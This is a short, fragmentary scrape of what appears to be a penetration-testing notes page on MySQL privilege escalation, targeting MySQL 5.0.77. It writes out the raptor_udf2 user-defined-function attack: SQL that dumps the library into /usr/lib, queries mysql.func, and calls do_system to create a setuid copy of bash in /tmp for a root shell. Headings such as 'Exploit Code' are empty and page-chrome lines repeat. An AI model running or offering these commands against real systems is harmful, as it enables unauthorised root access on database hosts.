MySQL Privilege Escalation
MySQL Server version: 5.0.77 Source distribution
Last updated
Was this helpful?
MySQL Server version: 5.0.77 Source distribution
Last updated
Was this helpful?
select * from foo into dumpfile '/usr/lib/raptor_udf2.so';
select * from mysql.func;
mysql> select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
Spawn Shell from MYSQL
Exploit Code
Exploit Code
Mysql general info for priv esc